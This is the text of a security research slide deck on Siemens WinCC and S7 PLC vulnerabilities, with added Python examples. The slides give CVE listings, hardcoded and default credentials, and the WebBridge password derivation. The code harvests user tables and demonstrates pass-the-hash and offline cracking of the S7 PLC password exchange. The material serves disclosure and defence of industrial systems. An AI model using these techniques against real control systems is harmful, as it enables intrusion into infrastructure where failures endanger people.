Scada strange love.

1. All pictures are taken from the Dr. Strangelove movie.
2. A group of security researchers focused on ICS/SCADA, to save Humanity from industrial disaster and to keep Purity Of Essence: Sergey Gordeychik, Gleb Gritsai, Denis Baranov, Roman Ilin, Ilya Karpov, Sergey Bobrov, Artem Chaykin, Yuriy Dyachenko, Sergey Drozdov, Dmitry Efanov, Yuri Goltsev, Vladimir Kochetkov, Andrey Medov, Sergey Scherbel, Timur Yunusov, Alexander Zaitsev, Dmitry Serebryannikov, Dmitry Nagibin, Dmitry Sklyarov, Alexander Timorin, Vyacheslav Egoshin, Roman Ilin, Alexander Tlyapov.
3. Goals: to automate the security assessment of ICS platforms and their environment. Objectives: to understand the system; to assess built-in security features; to create security audit/hardening guides; to automate the process. Vulnerabilities are the waste product of that process.
4. Goal: to create a PoC of a Stuxnet-style attack. Initial conditions: common ICS components and configuration; common ICS security tools; only weaknesses of the ICS components themselves; vulnerabilities found by the SCADA StrangeLove team.
5. Engineering tools: STEP 7, PCS7, TIA Portal. SCADA/HMI: WinCC (Windows), WinCC Flexible/Advanced (Windows/Win CE). S7 family PLCs: old line (200, 300, 400), new line (1200, 1500).
6. WinCC Server: Windows/MSSQL-based SCADA. WinCC Client (HMI): WinCC runtime + Project + OPC. WinCC Web Server (WebNavigator): IIS/MSSQL/ASP/ASP.NET/SOAP. WinCC WebClient (HMI): ActiveX/HTML/JS.
7. [Chart: per-year counts for 1997 through 2013; only axis ticks survived extraction, the data series is not recoverable.]
8. Cyber Weapon. Tactics, Techniques, and Procedures (TTPs). APT1, APT 2.0. Cyber Kill Chain.
9. ChinJa (R) (tm): Breaking through, Harvesting, Creeping death, Chaos.
10. That is a question!
11. http://bit.ly/RI6FtQ and http://bit.ly/UXn7d1
12. http://www.surfpatrol.ru/en/report
13. A lot of "WinCCed" IE installs (browsers carrying WinCC components) from many countries/companies/industries. Special prize to the guys from the US for WinCC 6.X in 2012.
14. XPath Injection (CVE-2012-2596); Path Traversal (CVE-2012-2597); XSS, about 20 instances (CVE-2012-2595). Fixed in Update 2 for WinCC V7.0 SP3: http://support.automation.siemens.com/WW/view/en/60984587
15. Lots of XSS and CSRF (CVE-2012-3031, CVE-2012-3028); lots of arbitrary file reading (CVE-2012-3030); SQL injection over SOAP (CVE-2012-3032); username and password disclosure via ActiveX abuse (CVE-2012-3034). Fixed in Update 3 for WinCC V7.0 SP3: http://support.automation.siemens.com/WW/view/en/63472422
16. Path Traversal (CVE-2013-0679); buffer overflow in ActiveX (CVE-2013-0674); XXE OOB (CVE-2013-0677); missing encryption of sensitive data (CVE-2013-0678); improper authorization (CVE-2013-0676). Fixed in WinCC 7.2 / SIMATIC PCS7 V8.0 SP1: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-714398.pdf
17. Network level: active scan of S7, Modbus, MSSQL (WinCC instance), HTTP(S), SNMP (public/private community strings hardcoded for PLCs and HMI panels); passive scan of Profinet. Host level: WinCC forensics.
18. Dmitry Efanov, PLCScan: http://scadastrangelove.blogspot.ru/2012/11/plcscan.html
19. Alexander Timorin, PHDays III release.
20. PdlRt.exe: graphic runtime. CCRtsLoader.EXE: loader. s7otbxsx.exe: network. Inter-process communication: RPC, sections (memory-mapped files), \BaseNamedObjects\TCPSharedMm and other interesting stuff.
21. Detecting the active project: HKCU\Software\SIEMENS\WINCC\ControlCenter\Default Settings, values LastOpenPath and LastProject. Detecting the MS SQL database name (timestamp): ArchiveManager\AlarmLogging, ArchiveManager\TagLogging*. Obtaining information from database and system objects.
22. Database naming:
   • {Hostname}_{Project}_TLG*: TAG data
   • CC_{Project}_{Timestamp}*: project data and configuration; users, PLCs, privileges
23. Users: managed by the UM app, stored in dbo.PW_USER.
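Slides 21 to 23 describe the host-level triage: find the project's databases on the MS SQL instance by their naming scheme and then read the user table. The following is an added example written for this page; it is not the team's WinCC Harvester and not a Siemens tool. It assumes the timestamp in CC_{Project}_{Timestamp} is written YY-MM-DD_hh_mm_ss (the slides give no format), and the database names it runs on are constructed, not taken from a real installation.

```python
"""Classify WinCC database names and build the dbo.PW_USER query.

Added example, not code from the slides. The timestamp layout in CC_RE and
every name in SAMPLE_DATABASES are assumptions made for illustration.
"""
import re
from collections import defaultdict

# Constructed sample of sys.databases names as a harvester would list them.
SAMPLE_DATABASES = [
    "master", "tempdb", "model", "msdb",      # SQL Server system databases: ignored
    "CC_Plant1_13-05-21_10_15_00",            # project data and configuration
    "CC_Plant1_13-05-21_10_15_00R",           # constructed variant with a suffix
    "HMI01_Plant1_TLG",                       # tag logging
    "HMI01_Plant1_TLGF",
    "CC_Pump_13-04-02_08_00_00",
]

# CC_{Project}_{Timestamp}*  (timestamp format assumed: YY-MM-DD_hh_mm_ss)
CC_RE = re.compile(
    r"^CC_(?P<project>.+)_(?P<ts>\d{2}-\d{2}-\d{2}_\d{2}_\d{2}_\d{2})(?P<suffix>.*)$"
)
# {Hostname}_{Project}_TLG*  (hostnames without underscores assumed)
TLG_RE = re.compile(r"^(?P<host>[^_]+)_(?P<project>.+)_TLG(?P<suffix>.*)$")


def triage(names):
    """Group database names by WinCC project: config DBs, tag DBs, HMI hosts."""
    projects = defaultdict(lambda: {"config_dbs": [], "tag_dbs": [], "hosts": set()})
    for name in names:
        m = CC_RE.match(name)
        if m:
            projects[m["project"]]["config_dbs"].append(name)
            continue
        m = TLG_RE.match(name)
        if m:
            projects[m["project"]]["tag_dbs"].append(name)
            projects[m["project"]]["hosts"].add(m["host"])
    return dict(projects)


def latest_config_db(config_dbs):
    """Pick the newest CC_ database; the assumed YY-MM-DD_hh_mm_ss layout sorts lexically."""
    return sorted(config_dbs, key=lambda n: CC_RE.match(n)["ts"], reverse=True)[0]


SAFE_DB_NAME = re.compile(r"^[A-Za-z0-9_\-]+$")


def user_table_query(config_db):
    """T-SQL that reads the UM application's user table (dbo.PW_USER).

    The database name lands in an identifier position, where parameter binding
    does not apply, so it is checked against a strict allow-list and anything
    unexpected is refused rather than quoted.
    """
    if not SAFE_DB_NAME.match(config_db):
        raise ValueError(f"unexpected database name: {config_db!r}")
    return f"SELECT * FROM [{config_db}].dbo.PW_USER"


if __name__ == "__main__":
    found = triage(SAMPLE_DATABASES)
    for project, info in found.items():
        print(project, info)
        if info["config_dbs"]:
            print("  ", user_table_query(latest_config_db(info["config_dbs"])))
```

The query is only built here, not executed; on a live host it would be run through the WinCC instance's MSSQL connection found by the network scan on slide 17.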
24. CVE-2013-0676
25. Administrator:ADMINISTRATOR. Avgur2 > Avgur.
26. This is my encryption key.
27. Select from MS SQL via COM objects. "Special" Windows account. Shortcuts*. (*we don't know yet, you know)
28. Authentication via SQL-stored accounts. ServerID "magic" to get the WebBridge password. The magic is used for SCSWebBridgeX.
29. Too hard for me…
30. Oh! En/c(r)ypt[10]n! ServerID = Base64(RC2(pass, key)), where key = MD5(dll hardcode).
31. Not my department password!
32. All other connections use WNUSR for authentication; for authorization the ID parameter is used.
33. Not yet…
34. "Magic" password = MD5(WNUSR_DC92D7179E29.Password). WNUSR_DC92D7179E29.Password is generated during installation and stored in the registry via DPAPI. Good length and charset, but…
35. WinCC clients use a hardcoded account to communicate with the OPC Web bridge. The password for WNUSR_DC92D7179E29 is generated during installation and is probably strong. MD5(WNUSR_.Password) is stored with DPAPI protection. The "encrypted" password for WNUSR_DC* can be obtained by a request to WinCCWebBridge.dll. WNUSR_DC92D7179E29 is the only account used for work with Windows/Database.
36. …responsible disclosure
37. What is a Project? A collection of ActiveX/COM/.NET objects, event handlers and other code (C/VB), configuration files, XML and other. Can a Project be trusted? Ways to spread malware with a Project?
38. NO! The Project itself is dynamic code, and it's easy to patch it "on the fly". Vulnerabilities in data handlers (CVE-2013-0677). How to abuse? Simplest way: patch the event handlers.
39. Hardcoded SNMP community string (unfixed). Hardcoded S7 PLC CA certificate (Dmitry Sklyarov): http://scadastrangelove.blogspot.com/2012/09/all-your-plc-belong-to-us.html. Multiple vulnerabilities in the S7-1200 PLC web interface (Dmitriy Serebryannikov, Artem Chaikin, Yury Goltsev, Timur Yunusov): http://www.siemens.com/corporatetechnology/pool/de/forschungsfelder/siemens_security_advisory_ssa-279823.pdf
40. PLC access can be protected by a password. Authentication is a simple challenge-response: the password is hashed (SHA-1) on the client (TIA Portal); the server (PLC) provides a 20-byte challenge; the client calculates HMAC-SHA1(challenge, SHA1(password)) as the response.
41. (same slide, build-up)
42. The SHA-1 is stored in the PLC project files. It can be intercepted during a firmware update/project upload, and it can be extracted from the project file. SHA-1(pass) vs HMAC-SHA1(challenge, SHA1(pass)): the response depends only on SHA-1(pass), so whoever holds the hash can answer the challenge without ever knowing the password.
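The exchange on slides 40 to 42, modelled in Python as an added example (not code from the SCADA StrangeLove team and not TIA Portal's implementation). It assumes the password is UTF-8 encoded before SHA-1 and reads the slides' HMAC-SHA1(challenge, SHA1(password)) as HMAC keyed with SHA-1(password) over the challenge; the two attacks it shows (pass-the-hash from a project file, offline guessing from one sniffed pair) hold under either argument order because the client only ever needs the hash. All passwords and word lists are constructed.

```python
"""S7 PLC password challenge-response: legitimate login, pass-the-hash,
and offline cracking of a captured exchange.

Added example, not the original presentation's code. Key/message order of
the HMAC and the UTF-8 encoding are assumptions.
"""
import hashlib
import hmac
import os
from typing import Iterable, Optional


def password_hash(password: str) -> bytes:
    """Client side (TIA Portal): the password is reduced to SHA-1 before use.
    The same 20 bytes sit in the project file and cross the wire on upload."""
    return hashlib.sha1(password.encode("utf-8")).digest()


def plc_challenge() -> bytes:
    """PLC side: a fresh 20-byte challenge for each authentication attempt."""
    return os.urandom(20)


def client_response(challenge: bytes, pw_hash: bytes) -> bytes:
    """Client side: HMAC-SHA1 keyed with SHA-1(password) over the challenge
    (assumed order). Only the hash is needed, never the cleartext password."""
    return hmac.new(pw_hash, challenge, hashlib.sha1).digest()


def plc_verify(challenge: bytes, response: bytes, stored_hash: bytes) -> bool:
    """PLC side: recompute the expected response from the stored SHA-1."""
    expected = hmac.new(stored_hash, challenge, hashlib.sha1).digest()
    return hmac.compare_digest(expected, response)


def crack_captured(challenge: bytes, response: bytes,
                   wordlist: Iterable[str]) -> Optional[str]:
    """Offline attack on one sniffed challenge/response pair: the challenge is
    sent in clear, so each guess costs one SHA-1 plus one HMAC-SHA1 and the PLC
    never sees the attempts (the S7 password brute force tool from the
    releases list works on this principle)."""
    for candidate in wordlist:
        if hmac.compare_digest(client_response(challenge, password_hash(candidate)), response):
            return candidate
    return None


def demo() -> dict:
    """Run the three scenarios on constructed values; no PLC is contacted."""
    stored = password_hash("Purity0fEssence")   # what the PLC and the project file hold
    ch = plc_challenge()
    legit = plc_verify(ch, client_response(ch, password_hash("Purity0fEssence")), stored)
    # Attacker who only extracted SHA-1(pass) from a project file:
    pass_the_hash = plc_verify(ch, client_response(ch, stored), stored)
    # Attacker who only sniffed one exchange and owns a word list:
    sniffed = client_response(ch, stored)
    cracked = crack_captured(ch, sniffed, ["Avgur", "admin", "Purity0fEssence"])
    return {"legit": legit, "pass_the_hash": pass_the_hash, "cracked": cracked}


if __name__ == "__main__":
    print(demo())
```

The design flaw the model exposes is that SHA-1(password) is a password equivalent: the PLC stores it, the project file contains it, the upload transmits it, and the client needs nothing else. A scheme that kept a per-device salt on the PLC and derived the response from a slow KDF would stop the offline guessing but not the pass-the-hash, which needs the stored value itself to be unobtainable.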
43. Buffer overflow (CVE-2013-0669); Cross-Site Scripting (CVE-2013-0672, CVE-2013-0670, CVE-2013-0668); directory traversal/response splitting (CVE-2013-0671); server-side script injection (CVE-2012-3032). Fixed in WinCC (TIA Portal) V12: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-212483.pdf
44. Profinet scanner; WinCC Harvester 2.0: http://scadastrangelove.blogspot.com/search/label/Releases
45. TIA Portal Security Hardening Guide; S7 protocol password brute force tool and JtR; Simatic WinCC Security Hardening Guide; PLCScan tool; ICS/SCADA/PLC Google/Shodan CheatSheet; SCADA Safety in Numbers: http://scadastrangelove.blogspot.com/search/label/Releases